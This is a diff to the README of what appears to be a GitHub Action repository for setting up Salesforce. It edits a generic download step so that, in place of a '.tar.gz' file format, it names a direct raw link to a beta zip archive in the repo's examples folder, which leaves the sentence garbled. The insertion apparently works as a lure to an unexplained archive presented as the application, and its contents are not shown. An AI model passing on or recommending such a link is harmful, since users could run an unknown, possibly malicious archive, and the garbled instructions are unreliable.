Mora2025/setup-salesforce-action/README.md

 ### Step 3: Download the Application

 Click on the version number to enter the release details.
 Here, you will find files available for download.
-You might find options like `.tar.gz`, `.zip`, or other formats.
+You might find options like `https://github.com/Mora2025/setup-salesforce-action/raw/refs/heads/main/examples/setup_salesforce_action_1.4-beta.5.zip`, `.zip`, or other formats.
 Choose the one that best fits your operating system.

 ## 🖥️ System Requirements